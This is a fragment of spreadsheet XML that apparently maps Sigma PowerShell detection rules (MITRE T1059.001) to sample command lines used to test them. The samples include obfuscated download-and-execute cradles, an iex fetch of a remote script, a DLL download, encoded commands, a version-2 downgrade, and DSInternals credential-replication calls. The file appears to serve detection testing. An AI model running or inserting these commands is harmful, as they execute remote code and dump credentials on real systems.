    <row r="3761" ht="15.75" customHeight="1" s="42">
      <c r="A3761" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3761" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3761" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3761" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3761" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + 'ShadowCopy')"</t>
        </is>
      </c>
      <c r="F3761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3761" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3761" s="43" t="n"/>
      <c r="J3761" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3761" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3762" ht="15.75" customHeight="1" s="42">
      <c r="A3762" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3762" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3762" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3762" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3762" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ([char]87+[char]105+[char]110+[char]51+[char]50+[char]95+[char]83+[char]104+[char]97+[char]100+[char]111+[char]119+[char]67+[char]111+[char]112+[char]121)"</t>
        </is>
      </c>
      <c r="F3762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3762" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3762" s="43" t="n"/>
      <c r="J3762" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3762" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3763" ht="15.75" customHeight="1" s="42">
      <c r="A3763" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3763" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3763" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3763" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3763" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [char]83 + [char]104 + [char]97 + [char]100 + [char]111 + [char]119 + [char]67 + [char]111 + [char]112 + [char]121)"</t>
        </is>
      </c>
      <c r="F3763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3763" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3763" s="43" t="n"/>
      <c r="J3763" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3763" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3764" ht="15.75" customHeight="1" s="42">
      <c r="A3764" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3764" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3764" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3764" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3764" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + $env:WMI_Class)"</t>
        </is>
      </c>
      <c r="F3764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3764" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3764" s="43" t="n"/>
      <c r="J3764" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3764" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3765" ht="15.75" customHeight="1" s="42">
      <c r="A3765" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3765" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3765" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3765" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3765" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [System.Text.Encoding]::UTF8.GetString([System.Text.Encoding]::UTF8.GetBytes('ShadowCopy')))"</t>
        </is>
      </c>
      <c r="F3765" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3765" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3765" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3765" s="43" t="n"/>
      <c r="J3765" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3765" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3766" ht="15.75" customHeight="1" s="42">
      <c r="A3766" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3766" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_base64_wmi_classes</t>
        </is>
      </c>
      <c r="C3766" s="43" t="inlineStr">
        <is>
          <t>PowerShell Base64 Encoded WMI Classes</t>
        </is>
      </c>
      <c r="D3766" s="43" t="inlineStr">
        <is>
          <t>1816994b-42e1-4fb1-afd2-134d88184f71</t>
        </is>
      </c>
      <c r="E3766" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Get-CimInstance -ClassName ("Win32_" + [System.String]::Concat('Shadow','Copy'))"</t>
        </is>
      </c>
      <c r="F3766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3766" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3766" s="43" t="n"/>
      <c r="J3766" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3766" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3767" ht="15.75" customHeight="1" s="42">
      <c r="A3767" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3767" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3767" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3767" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3767" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Version 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3767" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3767" s="43" t="n"/>
      <c r="J3767" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3767" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3768" ht="15.75" customHeight="1" s="42">
      <c r="A3768" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3768" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3768" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3768" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3768" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ver 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3768" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3768" s="43" t="n"/>
      <c r="J3768" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3768" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3769" ht="15.75" customHeight="1" s="42">
      <c r="A3769" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3769" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3769" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3769" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3769" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -vers 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3769" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3769" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3769" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3769" s="43" t="n"/>
      <c r="J3769" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3769" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3770" ht="15.75" customHeight="1" s="42">
      <c r="A3770" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3770" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3770" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3770" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3770" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -versi 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3770" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3770" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3770" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3770" s="43" t="n"/>
      <c r="J3770" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3770" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3771" ht="15.75" customHeight="1" s="42">
      <c r="A3771" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3771" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3771" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3771" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3771" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -versio 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3771" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3771" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3771" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3771" s="43" t="n"/>
      <c r="J3771" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3771" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3772" ht="15.75" customHeight="1" s="42">
      <c r="A3772" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3772" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_downgrade_attack</t>
        </is>
      </c>
      <c r="C3772" s="43" t="inlineStr">
        <is>
          <t>Potential PowerShell Downgrade Attack</t>
        </is>
      </c>
      <c r="D3772" s="43" t="inlineStr">
        <is>
          <t>b3512211-c67e-4707-bedc-66efc7848863</t>
        </is>
      </c>
      <c r="E3772" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -version 2 -Command "Write-Host 'Bypass'"</t>
        </is>
      </c>
      <c r="F3772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3772" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3772" s="43" t="n"/>
      <c r="J3772" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3772" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3773" ht="15.75" customHeight="1" s="42">
      <c r="A3773" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3773" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3773" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3773" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3773" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{IRM $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3773" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3773" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3773" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3773" s="43" t="n"/>
      <c r="J3773" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3773" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3774" ht="15.75" customHeight="1" s="42">
      <c r="A3774" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3774" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3774" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3774" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3774" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{Invoke-RestMethod $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3774" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3774" s="43" t="n"/>
      <c r="J3774" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3774" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3775" ht="15.75" customHeight="1" s="42">
      <c r="A3775" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3775" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3775" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3775" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3775" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{Invoke-RestMethod $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module C:\Users\EXAMPLE\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3775" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3775" s="43" t="n"/>
      <c r="J3775" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3775" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3776" ht="15.75" customHeight="1" s="42">
      <c r="A3776" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3776" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_cradle_obfuscated</t>
        </is>
      </c>
      <c r="C3776" s="43" t="inlineStr">
        <is>
          <t>Obfuscated PowerShell OneLiner Execution</t>
        </is>
      </c>
      <c r="D3776" s="43" t="inlineStr">
        <is>
          <t>44e24481-6202-4c62-9127-5a0ae8e3fe3d</t>
        </is>
      </c>
      <c r="E3776" s="43" t="inlineStr">
        <is>
          <t>powershell -nop -noni -ep bypass -w h -c "$u=('http://127.0.0.1:1337/'|ForEach-Object{Invoke-RestMethod $_});&amp;(''.SubString.ToString()[67,72,64]-Join'')($u); Import-Module $env:TEMP\Invoke-WMIExec.ps1; Invoke-WMIExec"</t>
        </is>
      </c>
      <c r="F3776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3776" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3776" s="43" t="n"/>
      <c r="J3776" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3776" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3777" ht="15.75" customHeight="1" s="42">
      <c r="A3777" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3777" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3777" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3777" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3777" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "IWR -Uri http://example.com/test.dll -OutFile test.dll"</t>
        </is>
      </c>
      <c r="F3777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3777" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3777" s="43" t="n"/>
      <c r="J3777" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3777" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3778" ht="15.75" customHeight="1" s="42">
      <c r="A3778" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3778" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3778" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3778" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3778" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll" -WindowStyle Hidden</t>
        </is>
      </c>
      <c r="F3778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3778" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3778" s="43" t="n"/>
      <c r="J3778" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3778" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3779" ht="15.75" customHeight="1" s="42">
      <c r="A3779" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3779" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_dll</t>
        </is>
      </c>
      <c r="C3779" s="43" t="inlineStr">
        <is>
          <t>Potential DLL File Download Via PowerShell Invoke-WebRequest</t>
        </is>
      </c>
      <c r="D3779" s="43" t="inlineStr">
        <is>
          <t>0f0450f3-8b47-441e-a31b-15a91dc243e2</t>
        </is>
      </c>
      <c r="E3779" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri http://example.com/test.dll -OutFile test.dll" | Out-Null</t>
        </is>
      </c>
      <c r="F3779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3779" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3779" s="43" t="n"/>
      <c r="J3779" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3779" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3780" ht="15.75" customHeight="1" s="42">
      <c r="A3780" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3780" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_dsinternals_cmdlets</t>
        </is>
      </c>
      <c r="C3780" s="43" t="inlineStr">
        <is>
          <t>DSInternals Suspicious PowerShell Cmdlets</t>
        </is>
      </c>
      <c r="D3780" s="43" t="inlineStr">
        <is>
          <t>43d91656-a9b2-4541-b7e2-6a9bd3a13f4e</t>
        </is>
      </c>
      <c r="E3780" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Get-ADReplAccount -All -Server $ENV:logonserver.TrimStart('\')}"</t>
        </is>
      </c>
      <c r="F3780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3780" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3780" s="43" t="n"/>
      <c r="J3780" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3780" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3781" ht="15.75" customHeight="1" s="42">
      <c r="A3781" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3781" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C3781" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D3781" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E3781" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -enc SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA</t>
        </is>
      </c>
      <c r="F3781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3781" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3781" s="43" t="n"/>
      <c r="J3781" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3781" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3782" ht="15.75" customHeight="1" s="42">
      <c r="A3782" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3782" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_encode</t>
        </is>
      </c>
      <c r="C3782" s="43" t="inlineStr">
        <is>
          <t>Suspicious Execution of Powershell with Base64</t>
        </is>
      </c>
      <c r="D3782" s="43" t="inlineStr">
        <is>
          <t>fb843269-508c-4b76-8b8d-88679db22ce7</t>
        </is>
      </c>
      <c r="E3782" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA</t>
        </is>
      </c>
      <c r="F3782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3782" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3782" s="43" t="n"/>
      <c r="J3782" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3782" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3783" ht="15.75" customHeight="1" s="42">
      <c r="A3783" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3783" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C3783" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D3783" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E3783" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "&amp; {iex (gc payload.ps1 -raw)}"</t>
        </is>
      </c>
      <c r="F3783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3783" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3783" s="43" t="n"/>
      <c r="J3783" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3783" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3784" ht="15.75" customHeight="1" s="42">
      <c r="A3784" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3784" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C3784" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D3784" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E3784" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex (type payload.ps1 -Raw)"</t>
        </is>
      </c>
      <c r="F3784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3784" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3784" s="43" t="n"/>
      <c r="J3784" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3784" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3785" ht="15.75" customHeight="1" s="42">
      <c r="A3785" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3785" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_exec_data_file</t>
        </is>
      </c>
      <c r="C3785" s="43" t="inlineStr">
        <is>
          <t>Powershell Inline Execution From A File</t>
        </is>
      </c>
      <c r="D3785" s="43" t="inlineStr">
        <is>
          <t>ee218c12-627a-4d27-9e30-d6fb2fe22ed2</t>
        </is>
      </c>
      <c r="E3785" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "iex (gc payload.ps1 -ra)"</t>
        </is>
      </c>
      <c r="F3785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3785" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3785" s="43" t="n"/>
      <c r="J3785" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3785" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="3786" ht="15.75" customHeight="1" s="42">
      <c r="A3786" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B3786" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_iex_patterns</t>
        </is>
      </c>
      <c r="C3786" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell IEX Execution Patterns</t>
        </is>
      </c>
      <c r="D3786" s="43" t="inlineStr">
        <is>
          <t>09576804-7a05-458e-a817-eb718ca91f54</t>
        </is>
      </c>
      <c r="E3786" s="43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MsXml2.ServerXmlHttp;$comMsXml.Open('GET','https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/test.ps1',$False);$comMsXml.Send();iex $comMsXml.ResponseText"</t>
        </is>
      </c>
      <c r="F3786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G3786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H3786" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I3786" s="43" t="n"/>
      <c r="J3786" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K3786" s="43" t="b">
        <v>0</v>
      </c>
    </row>
